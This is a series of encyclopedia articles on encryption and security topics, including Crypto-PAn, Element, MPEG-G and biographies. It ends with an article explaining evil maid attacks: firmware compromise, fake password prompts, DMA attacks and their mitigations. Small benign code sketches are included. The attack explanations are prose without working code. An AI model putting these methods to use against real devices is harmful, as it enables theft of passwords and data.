Runa Sandvik is a computer security expert, known as a proponent of strong encryption. She was hired as The New York Times senior director of information security in March 2016 and is a proponent of the smartphone messaging application Signal. Personal life She acquired her first computer when she was fifteen years old. She studied computer science at the Norwegian University of Science and Technology. In 2014 Sandvik married Michael Auger, and the pair made their home in Washington, D.C. Tor anonymity network Sandvik was an early developer of the Tor anonymity network, a cooperative facility that helps individuals obscure the Internet Protocol (IP) address they are using to access the internet. Freedom of the Press Foundation Sandvik is a technical advisor to the Freedom of the Press Foundation. Black Hat Europe She serves on the review board of Black Hat Europe. Interviewed Edward Snowden Sandvik interviewed Edward Snowden in May 2014. Freedom of Information Access requests In February 2015 Sandvik documented her efforts to retrieve information about herself through Freedom of Information Act requests. Demonstrated how smart rifles with remote access can be remotely hacked Sandvik and her husband, Auger, demonstrated how smart rifles with remote access can be remotely hacked. The $13,000 TrackingPoint sniper rifle is equipped with an embedded Linux computer. According to Wired magazine, when used according to its specifications, the aiming computer can enable a novice to hit remote targets that would otherwise require a skilled marksman. However, the manufacturers designed the aiming computer with WiFi capabilities so that the shooter could upload video of their shots. Sandvik and Auger found they could initiate a Unix shell command-line interpreter and use it to alter parameters the aiming computer relies on, so that it will always miss its targets. They found that a knowledgeable hacker could use the shell to acquire root access.
Acquiring root access allowed an interloper to erase all the aiming computer's software—"bricking" the aiming computer. Initiatives at the New York Times Sandvik led efforts to make The New York Times available as a Tor onion service, allowing Times employees and readers to access the newspaper's site in ways that impede intrusive government monitoring. References External links Snowden interview Sandvik, Runa People associated with computer security
58027283
https://en.wikipedia.org/wiki/Column%20level%20encryption
Column level encryption
Column level encryption is a type of database encryption method that allows users to select specific information or attributes to be encrypted instead of encrypting the entire database file. To understand why column level encryption is different from other encryption methods like file level encryption, disk encryption, and database encryption, a basic understanding of encryption is required. Generally, when data are collected and stored as records, those records appear in a tabular format in rows in the database, with each row logging specific attributes. Some data can be more sensitive than others, for example, date of birth, social security number, home address, etc., which can act as personal identification. In order to ensure that this private information is transferred and stored securely, data goes through encryption, which is the process of encoding plaintext into ciphertext. Non-designated readers or receivers will not be able to read the data without the decryption key. Another example to illustrate this concept: given a database that stores clients' phone numbers, the set of phone numbers will appear to most readers as gibberish alphanumerical text with a mix of symbols, totally useless to those who do not have the access privilege to view the data in plaintext (original form). Because not all stored data are always sensitive and important, column level encryption was created to give users the flexibility of choosing what sort of attributes should or should not be encrypted. This minimizes the performance disruption of executing crypto algorithms while moving data in and out of devices. Application and advantages The technology has been adopted by many encryption software companies around the world, including IBM, MyDiamo (Penta Security), Oracle and more. Column level encryption does not use the same encryption key for every column, as table encryption does, but rather separate keys for each column. This method minimizes the probability of unauthorized access.
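The one-key-per-column idea can be sketched as follows. This toy example (names and scheme are hypothetical) derives a distinct key for each column from a master key and encrypts only the columns marked sensitive, leaving the rest in plaintext; it uses a simple SHA-256-based keystream purely for illustration, not a production cipher:

```python
import hashlib
import secrets

def derive_column_key(master_key: bytes, column: str) -> bytes:
    # A separate key per column, derived from the master key and column name.
    return hashlib.sha256(master_key + b"|" + column.encode()).digest()

def xor_stream(key: bytes, nonce: bytes, data: bytes) -> bytes:
    # Toy stream cipher: SHA-256 keystream XORed with the data.
    # Illustrative only; use a vetted AEAD cipher in practice.
    out = bytearray()
    counter = 0
    while len(out) < len(data):
        out.extend(hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest())
        counter += 1
    return bytes(a ^ b for a, b in zip(data, out))

def encrypt_record(master_key: bytes, record: dict, sensitive: set) -> dict:
    # Encrypt only the chosen columns; other columns stay in plaintext.
    encrypted = {}
    for column, value in record.items():
        if column in sensitive:
            nonce = secrets.token_bytes(12)
            key = derive_column_key(master_key, column)
            encrypted[column] = (nonce, xor_stream(key, nonce, value.encode()))
        else:
            encrypted[column] = value
    return encrypted

def decrypt_field(master_key: bytes, column: str, stored) -> str:
    nonce, ciphertext = stored
    key = derive_column_key(master_key, column)
    return xor_stream(key, nonce, ciphertext).decode()
```

Because each column's key is derived independently, compromising the key for one column does not expose the others, which is the access-limiting property described above.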
Advantages of column-level encryption: Flexibility in data to encrypt. The application can be written to control when, where, by whom, and how data is viewed Transparent encryption is possible More secure as each column can have its own unique encryption key within the database Encryption is possible when data is active and not just “at rest” Retrieval speed is maintained because there's less encrypted data References Cryptographic software
58056697
https://en.wikipedia.org/wiki/David%20Cornstein
David Cornstein
David Bernard Cornstein (born August 17, 1938) is an American businessman and diplomat who served as the United States Ambassador to Hungary between 2018 and 2020. Cornstein made a career in the gambling, jewelry, and telemarketing industries. Early life and education Cornstein was born in New York City on August 17, 1938. As the only child of Irwin, who worked in the rug business, and Fanny, a schoolteacher, Cornstein grew up in the city. His maternal grandparents immigrated to the U.S. from Hungary. Cornstein attended P.S. 168 in The Bronx and later attended Horace Mann School, graduating in 1956. He earned a B.A. in 1960 from Lafayette College in Easton, Pennsylvania, where he is still a donor and part of the college's Marquis Society today. He subsequently earned an M.B.A. from New York University (NYU). Cornstein then served as a cook in the Army Reserve. Career Cornstein started his career while studying at NYU. He opened a jewelry counter in a J. C. Penney store on Long Island and later expanded the operations into a company called Tru-Run, selling jewelry in department stores throughout the U.S. Cornstein served as the president, chief executive officer, and a director. The company bought a similar firm, Seligman and Latz, in 1985 and Finlay Fine Jewelry for $217 million in 1988. Cornstein formed a new holding company, Finlay Enterprises, where he became president and chief executive in December 1988 and continued as a director of Finlay Fine Jewelry. The company continued to grow through the economic downturn in 1989, and in the 1990s expanded into Europe. In January 1999, Cornstein left Finlay as acting chief executive. He was appointed to the New York Off-Track Betting Commission in 1994 and eventually became its chairman. He promoted ideas like televising races live and an 800 telephone number for gamblers to wager. Cornstein contemplated runs for Mayor of New York City in 1985 and 1991.
He briefly declared himself a candidate for New York State Comptroller in 2001. Cornstein later dropped out of the race after Republican leaders backed the eventual candidate, John Faso. In September 1999, he was named chairman of TeleHubLink, a telemarketing company that produced wireless encryption products. He had been a director of What A World! since July 1993, before it changed its name to TeleHub. His connection with TeleHubLink proved problematic when, in April 2001, Eliot Spitzer filed a lawsuit against TeleHubLink for violating consumer protection laws. The State argued: Using the name Triple Gold Benefits, Telehublink Inc.'s telemarketers promised thousands of consumers across the nation that, for an advance fee of over $200, the consumers would receive a low rate, general purpose Visa or MasterCard credit card. In fact, consumers who paid the advance fee did not receive a credit card. Instead, Telehublink sent them a 'discount benefits package' consisting of generally worthless items such as an application for a credit card. In January 2003, the Third Department of the New York State Supreme Court, Appellate Division, upheld a 2001 ruling that "had halted the scam and awarded restitution to victimized consumers." Cornstein was previously the chairman of Pinnacle Advisors Ltd., in addition to being CEO, president, and chairman emeritus of Finlay Enterprises. In 2006, Cornstein was elected chairman of the board of the Jewelers' Security Alliance. New York Governor George Pataki gave Cornstein the chairmanship of the New York State Olympic Games Commission as it prepared a bid for the 2012 games, which eventually went to London. U.S. Ambassador to Hungary A life-long Republican, Cornstein has been a frequent contributor to Republican politicians, although he has also donated to the campaigns of Democrats Chuck Schumer and Cory Booker. On February 13, 2018, United States President Donald Trump nominated Cornstein to be U.S. Ambassador to Hungary.
Cornstein was a long-time friend of Trump's. He was a member of Trump's golf club in West Palm Beach. As Ambassador, Cornstein vocally defended the government of Viktor Orbán. According to The Washington Post, Cornstein sought to "charm" rather than shame Orbán. According to some critics, under Orbán's premiership, Hungary underwent democratic backsliding, becoming increasingly authoritarian. Cornstein told Hungarian media that he had seen no evidence of this authoritarian shift, despite reports of "mounting evidence" that the government had infringed on human rights in Hungary. The Hungarian government and its defenders gleefully repeated Cornstein's remarks. In a 2019 interview with The Atlantic's Franklin Foer, asked about Orbán's own description of his administration as an "illiberal democracy", Cornstein said, "I can tell you, knowing [Trump] for a good 25 or 30 years, that he would love to have the situation that Viktor Orbán has, but he doesn't." In September 2018, Cornstein claimed that he had reached an agreement with Orbán that Central European University, a notable American university in Budapest, would be allowed to stay in Hungary. However, in December 2018, Central European University alleged it had been kicked out of Hungary in what The Washington Post described as "a dark waypoint in Hungary's crackdown on civil society and an ominous sign for U.S. institutions operating under autocratic regimes worldwide." During the same week that Central European University chose to leave Hungary, Cornstein described Orbán as a "friend" and criticized George Soros, who founded the university. Cornstein stated that Soros had a crazed hatred of Orbán, which led CEU not to make concessions to stay in Hungary. Cornstein mocked the size of Central European University, said that the departure of CEU "doesn't have anything to do with academic freedom", and mused about why "this has become such an important subject in the world".
Asked by The Atlantic's Franklin Foer if US relations with Hungary would suffer as a result of the CEU ouster, Cornstein answered "not really." When Cornstein gave his answer, his aide asked him to step out of the room; Cornstein told Foer, "I'm in trouble." In October 2019, The New York Times published a story documenting controversies in Cornstein's tenure as U.S. Ambassador to Hungary, highlighting his close support of Orbán's policies and unchecked power, as well as extravagant spending on parties. On September 15, 2020, the U.S. Embassy in Budapest announced that Cornstein informed President Trump and Hungarian Foreign Minister Péter Szijjártó that he would end his service as U.S. Ambassador to Hungary effective November 1, 2020. In doing so, the ambassador said that "it has been an honor and a privilege to serve the country that I love in a country that I have come to cherish." References Further reading 1938 births Ambassadors of the United States to Hungary Horace Mann School alumni Lafayette College alumni New York University alumni Living people New York (state) Republicans Businesspeople from New York City American jewellers American people of Hungarian-Jewish descent Jewish American government officials 21st-century American Jews
58216843
https://en.wikipedia.org/wiki/Spyros%20Magliveras
Spyros Magliveras
Spyros Simos Magliveras (born 6 September 1938 in Athens; biographical information from American Men and Women of Science, Vol. 5, Thomson Gale, Detroit 2004) is a Greek-born American mathematician and computer scientist. Biography Magliveras graduated from the University of Florida with a bachelor's degree in electrical engineering in 1961 and a master's degree in mathematics in 1963. From 1963 to 1964 he was an instructor of mathematics at Florida Presbyterian College, and from 1964 to 1968 a teaching fellow in mathematics at the University of Michigan, as well as, from 1965 to 1968, a programming analyst and a systems analyst at the University of Michigan Institute for Social Research. He received his PhD in mathematics from the University of Birmingham, UK in 1970, with thesis advisor Donald Livingstone and thesis The subgroup structure of the Higman-Sims simple group. At the State University of New York at Oswego, he was an assistant professor from 1970 to 1973 and an associate professor from 1973 to 1978. From 1978 to 2000 he was a professor of mathematics and computer science at the University of Nebraska-Lincoln, retiring as professor emeritus in 2000. Since 2000 he has been a professor at Florida Atlantic University (FAU). He was the director of FAU's Center for Cryptology and Information Security from 2003 to 2013, and since 2013 he has been the center's associate director. He has been a visiting professor at the University of Birmingham (1984/85), at the University of Waterloo (1999), at the Sapienza University of Rome (two months in 2000), and at the University of Western Australia (two months in 2000). Magliveras does research on combinatorial designs, permutation groups, finite geometries, encryption of data (cryptography), and data security. In 2001 he received the Euler Medal. He is a co-author of the 2007 book Secure group communications over data networks. Magliveras has been married since 1961 and has two children.
References External links Homepage at Florida Atlantic University 20th-century American mathematicians 21st-century American mathematicians American people of Greek descent Combinatorialists University of Florida alumni Alumni of the University of Birmingham University of Nebraska–Lincoln faculty Florida Atlantic University faculty 1938 births Living people University of Michigan fellows
58400960
https://en.wikipedia.org/wiki/Element%20%28software%29
Element (software)
Element (formerly Riot and Vector) is a free and open-source software instant messaging client implementing the Matrix protocol. Element supports end-to-end encryption, groups and sharing of files between users. It is available as a web application, as desktop apps for all major operating systems and as a mobile app for Android and iOS. History Element was originally known as Vector when it was released from beta in 2016. The app was renamed to Riot in September of the same year. In 2016, the first implementation of Matrix end-to-end encryption was rolled out as a beta to users. In May 2020, the developers announced enabling end-to-end encryption by default in Riot for new non-public conversations. In April 2019, a new application was released on the Google Play Store in response to cryptographic keys used to sign the Riot Android app being compromised. In July 2020, Riot was renamed to Element. In January 2021, Element was briefly suspended from the Google Play Store in response to a report of user-submitted abusive content on Element's default server, matrix.org. Element staff rectified the issue and the app was brought back to the Play Store. Technology Element is built with the Matrix React SDK, which is a React-based software development kit to ease the development of Matrix clients. Element relies on web technologies and uses Electron for bundling the app for Windows, MacOS and Linux. The Android and iOS clients are developed and distributed with their respective platform tools. On Android, the app is available both in the Google Play Store and the free-software-only F-Droid archives, with minor modifications. For instance, the F-Droid version does not contain the proprietary Google Cloud Messaging plug-in. Features Element is able to bridge other communications into the app via Matrix, including IRC, Slack, Telegram, Jitsi Meet and others. It also integrates peer-to-peer and group voice and video chats via WebRTC.
Element supports end-to-end encryption (E2EE) of both one-to-one and group chats. Reception Media compared Element to Slack, WhatsApp and other instant messaging clients. In 2017, the German computer magazine Golem.de called Element (then Riot) and the Matrix server "mature" and "feature-rich", but criticized its key authentication at the time as not user-friendly for users owning multiple devices. A co-founder of the project, Matthew Hodgson, assured that the key verification process was a "placeholder" solution to be worked on. In 2020, Element added key cross-signing to make the verification process simpler, and enabled end-to-end encryption by default. See also Matrix IRC Rich Communication Services (RCS) Session Initiation Protocol (SIP) XMPP References External links Communication software Cross-platform software Free and open-source Android software Free instant messaging clients Mobile instant messaging clients IOS software Linux software macOS software Windows software
58428725
https://en.wikipedia.org/wiki/Crypto-PAn
Crypto-PAn
Crypto-PAn (Cryptography-based Prefix-preserving Anonymization) is a cryptographic algorithm for anonymizing IP addresses while preserving their subnet structure. That is, the algorithm encrypts any string of bits a to a new string E(a), while ensuring that for any pair of bit-strings which share a common prefix of length k, their images also share a common prefix of length k. A mapping with this property is called prefix-preserving. In this way, Crypto-PAn is a kind of format-preserving encryption. The mathematical outline of Crypto-PAn was developed by Jinliang Fan, Jun Xu, Mostafa H. Ammar (all of Georgia Tech) and Sue B. Moon. It was inspired by the IP address anonymization done by Greg Minshall's TCPdpriv program circa 1996. Algorithm Intuitively, Crypto-PAn encrypts a bit-string of length n by descending a binary tree of depth n, one step for each bit in the string. Each of the binary tree's non-leaf nodes has been given a value of "0" or "1", according to some pseudo-random function seeded by the encryption key. At each step of the descent, the algorithm computes the i-th bit of the output by XORing the i-th bit of the input with the value of the current node. The reference implementation takes a 256-bit key. The first 128 bits of the key material are used to initialize an AES-128 cipher in ECB mode. The second 128 bits of the key material are encrypted with the cipher to produce a 128-bit padding block P. Given a 32-bit IPv4 address a, the reference implementation performs the following operation for each bit i of the input: Compose a 128-bit input block B_i from the first i−1 bits of a followed by the trailing bits of the padding block P. Encrypt B_i with the cipher to produce a 128-bit output block O_i. Finally, XOR the i-th bit of that output block with the i-th bit of a, and append the result onto the output bitstring. Once all 32 bits of the output bitstring have been computed, the result is returned as the anonymized output E(a) which corresponds to the original input a.
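The per-bit loop above can be sketched in Python. This is not the reference implementation: it substitutes HMAC-SHA256 for the AES-based pseudo-random function (so its outputs will not match Crypto-PAn's), but it preserves the essential structure, in which the node value for bit i depends only on the key and the preceding plaintext bits:

```python
import hmac
import hashlib

def _prf_bit(key: bytes, prefix: str) -> int:
    # Pseudo-random node value for the tree node reached by `prefix`.
    # (HMAC-SHA256 stands in for the AES-based PRF of the reference code.)
    return hmac.new(key, prefix.encode(), hashlib.sha256).digest()[0] & 1

def anonymize(key: bytes, addr: int, width: int = 32) -> int:
    """Prefix-preserving anonymization of a `width`-bit integer."""
    bits = format(addr, "0{}b".format(width))
    out = []
    for i in range(width):
        # XOR the i-th input bit with the node value for the path so far.
        out.append(str(int(bits[i]) ^ _prf_bit(key, bits[:i])))
    return int("".join(out), 2)
```

Because the node value at step i is a function of the first i−1 plaintext bits only, two inputs agreeing on their first k bits are XORed with identical values over that prefix, so their outputs also agree on the first k bits and differ at the first differing bit, making the mapping prefix-preserving and one-to-one.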
The reference implementation does not implement deanonymization; that is, it does not provide a function D such that D(E(a)) = a. However, decryption can be implemented almost identically to encryption, just making sure to compose each input block using the plaintext bits decrypted so far, rather than using the ciphertext bits. The reference implementation does not implement encryption of bitstrings of lengths other than 32; for example, it does not support the anonymization of 128-bit IPv6 addresses. In practice, the 32-bit Crypto-PAn algorithm can be used in "ECB mode" itself, so that a 128-bit string S1‖S2‖S3‖S4 might be anonymized as E(S1)‖E(S2)‖E(S3)‖E(S4). This approach preserves the prefix structure of the 128-bit string, but does leak information about the lower-order chunks; for example, an anonymized IPv6 address consisting of the same 32-bit ciphertext repeated four times is likely the special address ::, which thus reveals the encryption of the 32-bit plaintext 0000:0000. In principle, the reference implementation's approach (building 128-bit input blocks from the plaintext prefix and the padding block) can be extended up to 128 bits. Beyond 128 bits, a different approach would have to be used; but the fundamental algorithm (descending a binary tree whose nodes are marked with a pseudo-random function of the key material) remains valid. Implementations Crypto-PAn's C++ reference implementation was written in 2002 by Jinliang Fan. In 2005, David Stott of Lucent made some improvements to the C++ reference implementation, including a deanonymization routine. Stott also observed that the algorithm preserves prefix structure while destroying suffix structure; running the Crypto-PAn algorithm on a bit-reversed string will preserve any existing suffix structure while destroying prefix structure. Thus, running the algorithm first on the input string, and then again on the bit-reversed output of the first pass, destroys both prefix and suffix structure.
(However, once the suffix structure has been destroyed, destroying the remaining prefix structure can be accomplished far more efficiently by simply feeding the non-reversed output to AES-128 in ECB mode. There is no particular reason to reuse Crypto-PAn in the second pass.) A Perl implementation was written in 2005 by John Kristoff. Python and Ruby implementations also exist. Versions of the Crypto-PAn algorithm are used for data anonymization in many applications, including NetSniff and CAIDA's CoralReef library. References Advanced Encryption Standard Symmetric-key algorithms
58443634
https://en.wikipedia.org/wiki/Oskar%20Vierling
Oskar Vierling
Oskar Walther Vierling (January 24, 1904, Straubing – 1986) was a German physicist, inventor, entrepreneur and professor of high-frequency technology. Vierling was an important inventor and engineer of electronic and electro-acoustic instruments between the 1930s and 1950s. Life Oskar Vierling attended school in Regensburg, and graduated with the Obersekundareife. In 1925 he graduated as an engineer at the Technische Hochschule Nürnberg in Nuremberg, and later attended the Telegraphentechnisches Reichsamt in Berlin. Vierling then took a position at the Heinrich Hertz Institute. Fritz Sennheiser was his student and joined him in the founding of the high-frequency institute of the University of Hannover. Vierling was married and had two sons, who later took over the Vierling Group. Career In 1929, Vierling, along with Walther Nernst, created the Neo-Bechstein electric grand piano design, which divided the strings into groups of five, each group with its own electrostatic pickup. Because the sound was amplified, the strings could be thinner and shorter. The Neo-Bechstein piano was eventually manufactured by the C. Bechstein piano company in 1932 after completion of development, but proved a commercial disappointment due to financial difficulties in the Bechstein company. In 1932, Vierling worked with Benjamin Miessner to design and invent the Elektrochord piano for the August Förster company. The Elektrochord was one of the first electric pianos, in which the vibrations of the string struck by the hammer were recorded electronically and then amplified. The sound was controllable in that it was configurable to provide a range from a salon grand piano to a full concert grand piano. In 1925, Vierling received his PhD with a thesis titled The Electroacoustic Piano. In 1938, Vierling was promoted to a full professorship at the Technical University of Hannover, and founded an institute for the study of high-frequency technology and electro-acoustics.
Wehrmacht In 1941, he was commissioned by the Wehrmacht to create the Vierling Group. For this high-frequency and electroacoustic armament research, Vierling built the research laboratory Feuerstein Castle in Ebermannstadt, which was located centrally in Germany and disguised as a Franconian castle and hospital. While at Feuerstein Castle, Vierling developed the first directional radio lines and tested and developed the control for the acoustically controlled G7es torpedo, Torpedo Wren (Zaunkönig), and later Torpedo Vulture (Geier). Vierling worked with Erich Hüttenhain at the OKW/Chi, Werner Liebknecht, who was Director of Engineering at Referat Wa Prüf 7 of the Waffenamt, and Erich Fellgiebel, Chief of Wehrmacht communications. Vierling worked with Hüttenhain, Liebknecht and Fellgiebel on the Hazardo machine. This machine was supposed to generate a random sequence of teleprinter letters on a normal teleprinter tape. Such a punched key tape could not only be easily duplicated but also be used directly for telex encryption or for deriving statistical letter or numerical sequences. Vierling also worked on the improvement of the encryption machine Lorenz SZ 42. Vierling later worked on the testing of the acoustic ignition of mines, and collaborated in the invention of an anti-radar coating for submarines with the code name chimney sweep. In addition, Vierling and his team developed radios and electric calculators. Another area that Vierling and his team worked on was ciphony. Of the six methods the lab developed during World War II to achieve secure voice, none were found to be successful, and Vierling failed to develop a secure voice system. Vierling had an ambivalent relationship to Nazism. On the one hand he was a member of the Nazi party; on the other hand he worked largely independently and was viewed negatively in the party apparatus, as he was not regularly present at party meetings.
After 1945 During the post-war period, Vierling made his intelligence technology, including covert listening devices, available for use to the Gehlen Organization, which enabled his group to survive. In July 1950, the group working on the Hazardo device moved in secrecy to Kransberg Castle to continue work. In October 1950, the Hazardo produced the first punched key tape. With the completion of the device, a separate four-person working group called Schlüsselmittelherstellung was formed to exploit the device. Between 1949 and 1955 Vierling taught as a professor of physics at the Philosophical-Theological College at the University of Bamberg. The first tests of the Deutsche Bundespost with transistor- and later microprocessor-based systems for mail delivery were based on Vierling's work. Awards and honours 1980: Order of Merit 1st class of the Federal Republic of Germany 1985: Bavarian Order of Merit References External links Vierling group 1904 births 1986 deaths 20th-century German physicists Instrument makers People from Straubing Officers Crosses of the Order of Merit of the Federal Republic of Germany
58483651
https://en.wikipedia.org/wiki/MPEG-G
MPEG-G
MPEG-G (ISO/IEC 23092) is an ISO/IEC standard designed for genomic information representation, developed through the collaboration of ISO/IEC JTC 1/SC 29/WG 9 (MPEG) and ISO TC 276 "Biotechnology" Work Group 5. The goal of the standard is to provide interoperable solutions for data storage, access, and protection across different possible implementations for data generated by high-throughput sequencing machines and their subsequent processing and analysis. The standard is composed of different parts, each one addressing a specific aspect, such as compression, metadata association, Application Programming Interfaces (APIs), and reference software for data decoding. Together with the reference decoder software, commercial and open-source implementations started to become available in 2019, covering progressively more of the published parts of the standard. Background The advent of high-throughput sequencing (HTS) technologies has revolutionized the field of quantitative biology. The availability of large collections of genomic information has now entered everyday practice and has become a cornerstone of a number of disciplines, ranging from biological research to personalized medicine in the clinic. At the moment, genomic information is mostly exchanged through a variety of data formats, such as FASTA/FASTQ for unaligned sequencing reads and SAM/BAM/CRAM for aligned reads. Biological studies typically produce genomic annotation data such as mapping statistics, quantitative browser tracks, variants, genome functional annotations, gene expression data, and Hi-C contact matrices. These diverse types of downstream genomic data are currently represented in different formats such as VCF, BED, GFF, etc., sometimes with loosely defined semantics. The ISO/IEC 23092 (MPEG-G) standard aims to provide a unified format for the efficient representation and compression of such diverse data, both for file storage and data transport.
In order to do that, the standard is divided into several parts. Structure of the standard The MPEG-G standard utilizes technology and data representation architectures previously validated in the field of digital media. They make it possible to compress and transport genome sequencing data even in complex scenarios, for instance when access is needed to large amounts of possibly distributed data, or when part of the data needs to be encrypted for privacy reasons. Conceptually, such requirements lead to the definition of a number of mutually interrelated mechanisms, which are summarized in the following list: Data format and compression Data streaming Compressed file concatenation Incremental update of sequencing data and metadata Selective access to compressed data, e.g. fast queries by genomic range Metadata association Enforcement of privacy rules Selective encryption of data and metadata Annotation and linkage of genomic segments. In turn, some of these topics have been grouped together, in order to make the standard easier to understand and implement. As a result, the ISO/IEC 23092 standard is physically structured as a series of separate documents, as follows: ISO/IEC 23092-1 MPEG-G Part 1 To be defined. ISO/IEC 23092-2 MPEG-G Part 2 To be defined. ISO/IEC 23092-3 MPEG-G Part 3 ISO/IEC 23092-3 specifies information metadata, protection metadata, auxiliary fields, SAM interoperability and programming interfaces of genomic information. It defines: Metadata storage and interpretation for the different encapsulation levels as specified in ISO/IEC 23092-1; Protection elements providing confidentiality, integrity and privacy rules at the different encapsulation levels specified in ISO/IEC 23092-1; How to associate auxiliary fields to encoded reads; Mechanisms for backward compatibility with existing SAM content, and exportation to this format; Interfaces to access genomic information coded in compliance with ISO/IEC 23092-1 and ISO/IEC 23092-2.
ISO/IEC 23092-4 MPEG-G Part 4 ISO/IEC 23092-4 specifies genomic information representation reference software, referred to as the genomic model (GM). It consists of two components: the reference encoder software and the reference decoder software. While the reference decoder software is provided to assess conformance to the requirements of ISO/IEC 23092-1, ISO/IEC 23092-2 and ISO/IEC 23092-6, the reference encoder software serves as a guide for the implementation of the aforementioned standards. The reference encoder software, called Genie, is open-source software developed by a group of individuals from multiple universities and companies around the world. It features several components. ISO/IEC 23092-5 MPEG-G Part 5 To be defined. ISO/IEC 23092-6 MPEG-G Part 6 To be defined. Filename extensions To be defined. See also MPEG ISO/IEC JTC 1/SC 29 References External links mpeg-g.org MPEG web site ISO/IEC 23092-1 ISO/IEC 23092-2 ISO/IEC 23092-3 ISO/IEC 23092-4 ISO/IEC 23092-5 ISO/IEC 23092-6 ISO/IEC standards Open standards covered by patents
58574904
https://en.wikipedia.org/wiki/Evil%20maid%20attack
Evil maid attack
An evil maid attack is an attack on an unattended device, in which an attacker with physical access alters it in some undetectable way so that they can later access the device, or the data on it. The name refers to the scenario where a maid could subvert a device left unattended in a hotel room – but the concept itself also applies to situations such as a device being intercepted while in transit, or taken away temporarily by airport or law enforcement personnel. Overview Origin In a 2009 blog post, security analyst Joanna Rutkowska coined the term "evil maid attack", hotel rooms being a common place where devices are left unattended. The post detailed a method for compromising the firmware on an unattended computer via an external USB flash drive – and thereby bypassing TrueCrypt disk encryption. D. Defreez, a computer security professional, first mentioned the possibility of an evil maid attack on Android smartphones in 2011. He discussed the WhisperCore Android distribution and its ability to provide disk encryption for Android devices. Notability In 2007, former U.S. Commerce Secretary Carlos Gutierrez was allegedly targeted by an evil maid attack during a business trip to China. He left his computer unattended during a trade talk in Beijing, and he suspected that his device had been compromised. Although the allegations have yet to be confirmed or denied, the incident caused the U.S. government to be more wary of physical attacks. In 2009, Symantec CTO Mark Bregman was advised by several U.S. agencies to leave his devices in the U.S. before travelling to China. He was instructed to buy new ones before leaving and dispose of them when he returned so that any physical attempts to retrieve data would be ineffective. Methods of attack Classic evil maid The attack begins when the victim leaves their device unattended. The attacker can then proceed to tamper with the system.
If the victim's device does not have password protection or authentication, an intruder can turn on the computer and immediately access the victim's information. However, if the device is password protected, as with full disk encryption, the firmware of the device needs to be compromised, which is usually done with an external drive. The compromised firmware often presents the victim with a fake password prompt identical to the original. Once the password is input, the compromised firmware sends the password to the attacker and removes itself after a reboot. To successfully complete the attack, the attacker must return to the device once it has been left unattended a second time to steal the now-accessible data. Another method of attack is a DMA attack, in which an attacker accesses the victim's information through hardware devices that connect directly to the physical address space. The attacker simply needs to connect to the hardware device in order to access the information. Network evil maid An evil maid attack can also be done by replacing the victim's device with an identical device. If the original device has a bootloader password, then the attacker only needs to acquire a device with an identical bootloader password input screen. If the device has a lock screen, however, the process becomes more difficult, as the attacker must acquire the background picture to put on the lock screen of the mimicking device. In either case, when the victim inputs their password on the false device, the device sends the password to the attacker, who is in possession of the original device. The attacker can then access the victim's data. Vulnerable interfaces Legacy BIOS Legacy BIOS is considered insecure against evil maid attacks. Its architecture is old, updates and Option ROMs are unsigned, and configuration is unprotected. Additionally, it does not support secure boot. These vulnerabilities allow an attacker to boot from an external drive and compromise the firmware.
The compromised firmware can then be configured to send keystrokes to the attacker remotely. Unified Extensible Firmware Interface Unified Extensible Firmware Interface (UEFI) provides many features necessary for mitigating evil maid attacks. For example, it offers a framework for secure boot, authenticated variables at boot-time, and TPM initialization security. Despite these available security measures, platform manufacturers are not obligated to use them. Thus, security issues may arise when these unused features allow an attacker to exploit the device. Full disk encryption systems Many full disk encryption systems, such as TrueCrypt and PGP Whole Disk Encryption, are susceptible to evil maid attacks due to their inability to authenticate themselves to the user. An attacker can still modify disk contents despite the device being powered off and encrypted. The attacker can modify the encryption system's loader code to steal passwords from the victim. Researchers have also explored the ability to create a communication channel between the bootloader and the operating system, in order to remotely steal the password for a disk protected by FileVault 2. On a macOS system, this attack has additional implications due to “password forwarding” technology, in which a user's account password also serves as the FileVault password, enabling an additional attack surface through privilege escalation. Thunderbolt In 2019, a vulnerability named "Thunderclap" was announced in the Intel Thunderbolt ports found on many PCs; it could allow a rogue actor to gain access to the system via direct memory access (DMA). This is possible despite use of an input/output memory management unit (IOMMU). The vulnerability was largely patched by vendors. It was followed in 2020 by "Thunderspy", which is believed to be unpatchable and allows similar exploitation of DMA to gain total access to the system, bypassing all security features.
Any unattended device Any unattended device can be vulnerable to a network evil maid attack. If the attacker knows the victim's device well enough, they can replace the victim's device with an identical model with a password-stealing mechanism. Thus, when the victim inputs their password, the attacker will instantly be notified of it and be able to access the stolen device's information. Mitigation Detection One approach is to detect that someone is close to, or handling, the unattended device. Proximity alarms, motion detector alarms, and wireless cameras can be used to alert the victim when an attacker is nearby their device, thereby nullifying the surprise factor of an evil maid attack. The Haven Android app was created in 2017 by Edward Snowden to do such monitoring, and transmit the results to the user's smartphone. In the absence of the above, tamper-evident technology of various kinds can be used to detect whether the device has been taken apart – including the low-cost solution of putting glitter nail polish over the screw holes. After an attack has been suspected, the victim can have their device checked to see if any malware was installed, but this is challenging. Suggested approaches are checking the hashes of selected disk sectors and partitions. Prevention If the device is under surveillance at all times, an attacker cannot perform an evil maid attack. If left unattended, the device may also be placed inside a lockbox so that an attacker will not have physical access to it. However, there will be situations, such as a device being taken away temporarily by airport or law enforcement personnel, where this is not practical. Basic security measures, such as having the latest up-to-date firmware and shutting down the device before leaving it unattended, prevent an attack from exploiting vulnerabilities in legacy architecture and allowing external devices into open ports, respectively.
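The hash-checking approach suggested under Detection above can be sketched as follows: record a baseline digest of a region an attacker would likely target (such as the start of the boot partition), then recompute and compare it after the device has been out of sight. The device path below is a placeholder, reading raw partitions normally requires elevated privileges, and this is an illustrative sketch rather than a complete integrity tool:

```python
import hashlib

def digest_region(path: str, length: int = 1024 * 1024, chunk: int = 65536) -> str:
    """SHA-256 of the first `length` bytes of a file or block device."""
    h = hashlib.sha256()
    remaining = length
    with open(path, "rb") as f:
        while remaining > 0:
            block = f.read(min(chunk, remaining))
            if not block:
                break  # region shorter than `length`
            h.update(block)
            remaining -= len(block)
    return h.hexdigest()

# Usage sketch (placeholder device path; record the baseline before
# leaving the machine unattended, then compare after returning):
# baseline = digest_region("/dev/sda1")
# ...
# assert digest_region("/dev/sda1") == baseline, "possible tampering"
```

The baseline must of course be stored somewhere the attacker cannot reach, e.g. on a separate trusted device, or the comparison proves nothing.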
